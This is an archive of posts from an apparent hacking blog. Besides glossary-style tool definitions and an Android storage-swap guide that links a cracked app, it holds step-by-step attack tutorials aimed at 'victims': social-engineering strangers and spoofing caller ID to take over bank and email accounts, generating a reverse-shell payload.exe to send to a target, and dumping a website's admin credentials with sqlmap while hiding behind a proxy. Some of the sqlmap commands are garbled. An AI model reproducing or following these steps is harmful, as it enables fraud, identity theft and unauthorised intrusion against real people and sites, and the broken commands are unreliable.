Friday, 8 January 2016

Hacking Tools Categories.

These include various OS like -
  1. Kali Linux or Backtrack 5
  2. BackBox
  3. DEFT
  4. Pentoo
  5. NodeZero
  6. Anonymous OS 

In cryptanalysis and computer security, password cracking is the process of recovering passwords from data that have been stored in or transmitted by a computer system. A common approach (brute-force attack) is to try guesses repeatedly for the password and check them against an available cryptographic hash of the password.
The purpose of password cracking might be to help a user recover a forgotten password (installing an entirely new password is less of a security risk, but it involves System Administration privileges), to gain unauthorized access to a system, or as a preventive measure by System Administrators to check for easily crackable passwords. On a file-by-file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file's access is restricted.

Cracking of wireless networks is the defeating of security devices in Wireless local-area networks. Wireless local-area networks(WLANs) – also called Wi-Fi networks are inherently vulnerable to security lapses that wired networks are exempt from.
Cracking is a kind of information network attack that is akin to a direct intrusion. There are two basic types of vulnerabilities associated with WLANs: those caused by poor configuration and those caused by weak encryption.

Packet crafting is a technique that allows network administrators to probe firewall rule-sets and find entry points into a targeted system or network. This is done by manually generating packets to test network devices and behavior, instead of using existing network traffic.

Network traffic monitoring is the process of reviewing, analyzing and managing network traffic for any abnormality or process that can affect network performance, availability and/or security.
It is a network management process that uses various tools and techniques to study computer network-based communication/data/packet traffic.

packet analyzer (also known as a network analyzer, protocol analyzer or packet sniffer—or, for particular types of networks, an Ethernet sniffer or wireless sniffer) is a computer program or piece of computer hardware that can intercept and log traffic that passes over a digital network or part of a network.

Rootkit is an application, that hides its presence or presence of another application on the computer, using some of the lower layers of the operating system, which makes them almost undetectable by common anti-malware software. So a Rootkit Detector is used.

A Security fuzzer is a tool used by security professionals (and professional hackers :) to test a parameter of an application. Typical fuzzers test an application for buffer overflows, format string vulnerabilities, and error handling. More advanced fuzzers incorporate functionality to test for directory traversal attacks, command execution vulnerabilities, SQL Injectionand Cross Site Scripting vulnerabilities. Web Vulnerability scanners typically perform all of this functionality, and can be considered an advanced fuzzer.

A debugger or debugging tool is a computer program that is used to test and debug other programs (the "target" program). The code to be examined might alternatively be running on an instruction set simulator (ISS), a technique that allows great power in its ability to halt when specific conditions are encountered.

Encryption software is software that can encrypt and decrypt data, often in the form of files on a hard drive or packets sent over a network.

An intrusion detection system (IDS) is a device or software application that monitors network or system activities for malicious activities or policy violations and produces reports to a management station. IDS come in a variety of "flavors" and approach the goal of detecting suspicious traffic in different ways.

 A software vulnerability is a security flaw, glitch, or weakness found in software or in an operating system (OS) that can lead to security concerns. So we can exploit this vulnerability using several tools like metasploit, sqlmap, etc.

Web Application Vulnerability Scanners are the automated tools that scan web applications to look for known security vulnerabilities such as cross-site scripting, SQL injection, command execution, directory traversal and insecure server configuration. A large number of both commercial and open source tools are available and and all these tools have their own strengths and weaknesses.

Digital forensics (sometimes known as digital forensic science) is a branch of forensic science encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime. Forensic tools help in collecting such data.

These include tools like Netcat, Vmware, Socat, cURL, etc.

Please Share :)

Thursday, 7 January 2016

Becoming a Great Hacker (All you need to know)

So How To Became A Great hacker ? Well, read this and more important is to implement these steps and then you might be a Renowned Hacker of the upcoming era :D who knows?

1. Learn TCP/IP, Basic Information gathering, Proxies, Socks, SSL, VPN, VPS, RDP, FTP, POP3, SMTP, Telnet, SSH.

2. Learn Linux, Unix, Windows - You can do this using vmware or any virtual desktop utility.

3. Learn a programming language that's compatible with all OS - Perl, Python, C, ASM

4. Learn HTML, PHP, Javascript, ASP, XML, SQL, XSS, SQLI, RFI, LFI

5. Learn Reverse engineering and crack some programs for serials easy ones like mirc, winzip, winrar or old games.

6. Code a fuzzer for common protocols - ftp, pop3, 80, 8080 - Pick some free software like ftp server, mail server, apache or iis webserver or a webserver all-in-one pack, or teamspeak, ventrilo, mumble.

7. Code a tool that uses grep to sort out unique code in source codes.

8. Make a custom IPtable, IPsec firewall that blocks all incoming traffic and out going traffic and add filters to accept certain ports that your software or scripts use.

9. Pick a kernel in linux or unix, also pick a Microsoft OS version lets say Winxp pro sp2 put them on the virtual desktops (vmware) and find and code a new local exploit in those versions, then install a Apache webserver on the Linux/Unix and a IIS webserver on the winxp pro and attempt to find and code a new local reverse_tcp_shell exploit.

10. Learn Cisco Router and Switch configuration and setup.

11. Learn Checkpoint Setup and Config

12. Learn WiFi scanning, cracking, sniffing.

13. Pick a person in you phone book for the area code you live in or city then ring the person on a anonymous line like Skype or a payphone or a carded sim and attempt to social engineer the person for his name, address, data of birth, city born, country born, ISP connected with, Phone company connected with, What bank he/she uses and anything else you can get. Then Attempt to ring using a spoof caller ID software with the person's phone number - call the ISP and try reset the password to his/her internet connection/web-mail, get access to bank account or ask them to send out a new *** to a new address (drop) with a new pin, reset of phone company passwords.

14. Use your information gathering skills to get all the information off a website like a shop then use the spoof caller-id software or hack your phone to show a new number of the Web server's Tech Support number then ring the shop owner and try get the shop site password.

15. Do the same thing but attempt to use a web attack against a site or shop to gain admin access.
16. Once got access upload a shell and attempt to exploit the server to gain root using a exploit you coded not someone else s exploit.

17. Make your own Linux Distro

18. Use your own Linux Distro or use a vanilla Linux gnome (not KDE) keep it with not much graphics so you can learn how to depend on the terminal and start from scratch install applications that you will only need for a blackbox (Security test box), make folders for fuzzers, exploits, scanners..etc Then load them up with your own scripts and other tools ( By this stage you shouldn't need to depend on other peoples scripts).

19. Learn macosx and attempt to gain access to a Macosx box whether it be your own or someone's else.

20. Create a secure home network and secure your own systems with your own Security policies and firewall settings.

All this isn't a over night learning it will take a nice 3 - 4 years to learn a bit of this 5+ years to learn most of it and even then you may need time to keep learn as IT keeps changing ever day.

As long as your dedicated to learning you won't have any problems and if you learn all that you should easy get a job in any company if you show proof that you can do these things (print out scripts that you made or put on disc) to show the companies.


Like and Share :)
© Programmed Hackers ;)

Saturday, 12 July 2014

Easiest way to Swap any Android's External sd and Internal. :)

Requirements :- 
  • A rooted Android (If your Android is not rooted than read this - Rooting Android )
  • Root Explorer
  • Some Brain.
These days, a lot of Android phones and tablets with internal storage of 1 Gigabyte or more are partitioned by default into two parts:
  • Phone's internal storage: Stores system apps, other system files.
  • Internal sdcard: Stores apps data, sd data in case of heavy games. Basically it works similar to what a normal sdcard works to on every other phones that comes with such partitions.

See the swapping magic

Guide: Swapping your internal and external sdcard

  • First of all, you must have a rooted Android as mentioned earlier. If your Android is not rooted then Root it easily by following the steps given here : How to root your Android.
  • Now Download and install Root Explorer. You can download the cracked version at : Root Explorer 3.1.7 apk
  • Open Root Explorer and go through this file located at :
" System/etc/void.fstab "

  • Mount the Directory as read and write (R/W)
  • Open "void.fstab" 
  • Look for these lines and make these changes-
  • “dev_mount sdcard /mnt/sdcard” and change it to “dev_mount sdcard /mnt/ extsd”
  • "dev_mount extsd /mnt/extsd” and change it to “dev_mount extsd /mnt/ sdcard”
Make sure that you only make changes to the word “sdcard” and “extsd” and nothing else. This will show the internal memory as external memory and the external (SD card) as internal memory.
Once done, save this file and go back to Root Explorer.
  • A backup file named “void.fstb.bak” will be automatically created. Delete this file by pressing hold the file and select delete. Close the Root Explorer app.
  •  Switch off the Phone and switch it back on. Go to Settings then storage and check internal storage. Your internal memory memory will become external card storage and external storage will become Internal memory.

Ask me if u have any Queries. 

Sunday, 23 February 2014

Changing Administrator Password using Command Prompt (CMD) !

After reading this post, you’ll be able to change your(or anyone’s) Administrator account password in windows 7, without asking him the previous one. Usually, for changing the passwords, we go to User Accounts in Control Panel and then opt for changing the passwords. But windows doesn't permit us to do so, till we enter the previous password.

So, it’s clear that we can’t change the password from this method. Because, the current password is also required here, which we don’t know.
But, the same thing can become possible, if perform the same task through Windows Command Prompt (CMD). In this method, we are not prompted to enter the current/old password. But for that, we first need to be logged in as an Administrator (see step 2 below), unless you will be shown an error message stating “System 5 Error”. So, I don’t want you to get this “System 5 Error”, that’s why I was focusing on this point. This hack is very easy, you are only required to perform my all steps, in the exact manner. If you still get any problem, then you can drop your comments below this post.
 The steps are as follows :-
Step-1 :- Press start, and search CMD (windows command prompt).
Step-2 :- Now, do right click on CMD and select RUN AS ADMINISTRATOR(it’s the most important step of this hack, unless “System 5 Error” will be shown in the end) and then click OK. Most of the users don’t read the whole sentence and press Enter right after searching CMD in this step. Those users get an error named “System 5 Error”. So, please don’t press Enter directly on CMD.
This hack only works when you’re logged in to the Administrator(or administrator like) account. This hack need Administrator(or administrator like) privileges, unless it shows “System 5 Error”. This hack is thus NOT POSSIBLE if you are logged in with the GUEST ACCOUNT.
Step-3 :- Now type the command NET USER and  press ENTER It will give u the names of all the USER A/C’s existing in your computer.

Step-4 :- Here, in this pic, you are getting three names, which are Kamesh, Vaibhav and Guest. We are not at all interested in the Guest account for sure. So leave that. Now the two accounts are left. One is Kamesh and the other is Vaibhav. Here, the both the accounts are having admin priviledges. In most of the cases the main admin account, which is ‘Kamesh’ here, is hidden. And the other account, named ‘Vaibhav’ here, is shown, which is a ADMIN-LIKE account. So, this account also have full admin priviledges. Because only one admin account which is visible here is ‘Vaibhav’, so we will deal with this account in this process.
So, now use our next command, which is net user Vaibhav *
Here, there’s ONE SPACE between NET and USER as well as between Vaibhav and *
Step-5 :- Here u are, now directly enter the new ADMINISTRATOR PASSWORD and press enter again confirm ur new password and press enter. You will not see any ************* type of characters in the CMD window when you will be typing your password. But you don’t worry. They are not visible but they got typed. Re-type the same password in Confirm Password option.
Step-6 : U are done. Just type EXIT and then press ENTER to exit. That’s all
Share if u find Useful ! :)
© Programmed Hackers :)

Sunday, 16 February 2014

Hacking A Computer Using Fastrack on Backtrack.

Requirments :

1. Backtrack 
2. IP address of victim.
3. Brain.

Now follow these steps :
1. Open Fastrack by clicking on Applications-->Backtrack-->Exploitation tools-->Network exploitation tools-->Fast-Track-->fasttrack-interactive.

2. Now after opening fastrack select the option Payload generator by typing 8 and hitting enter.

3. Now after that type 1 to select Windows Shell Reverse_TCP and hit enter.

4. Now after that type 2 to select shikata_ga_nai and hit enter.

5. Now after that enter the IP address of victim and hit enter.
6. Now you have to scan IP address to get open ports. (Google regarding it)

7. If you get any open ports then enter it like in image.
8. After that type 3 to select Executable and hit enter, this option will create a executable file in  directory filesystem-->pentest>exploit-->fasttrack-->payload.exe.
9. Now the send executable file to victim and when the victim open this file you will be connected to computer remotely. 

Share if u find Useful ! :)
© Programmed Hackers :)

Thursday, 6 February 2014

SQL Injection Using SqlMap (Backtrack 5 R3)

Sqlmap Is An Automated Pen Testing Tool. That Automates The Process Of Detecting And Exploiting SQL Injection Flaws And Taking Over Of Databases. It Comes With A Powerful Detection Engine, Many Niche features For The Ultimate Pen Tester And A Broad Range Of Switchs Lasting From Database Fingerprinting. Over Data Fetching From The Database. This Tool Is Best For Beginners. Who Just Now Entered In Security Field. It Is Easy To Use Tool. This Tool Makes SQL Injection Easy As Compared To Manual SQL Injection.
Follow these simple steps to hack website using backtrack 5 sqlmap tool.

1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal

2. Now find the vulnerable site. (well I already have vulnerable site). You can search for vulnerable sites using Dorks. Google it!

3. Now type this command in the terminal and hit enter.
python -u http://yourvictim’slink/index.php?id=4 –dbs 

 4. Now you will get the database name of the website

Well I got the two database aj and information_schema we will select aj database.
5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.
python -u http://yourvictim’slink/index.php?id=4 -D  (database name) –tables
6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.
python -u http://www.yourvictim’ -D aj –tables

7. Now you will get the tables list which is stored in aj database.

8. Now lets grab the columns from the admin table
python -u http://www.yourvictim’ -T admin –columns

 Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin
python -u http://www.yourvictim’ -T admin -U test –dump
 Now we got the username and the password of the website !

Now just find the admin panel of the website and use proxy/vpn when you are trying to login in the website as a admin

© Programmed Hackers :)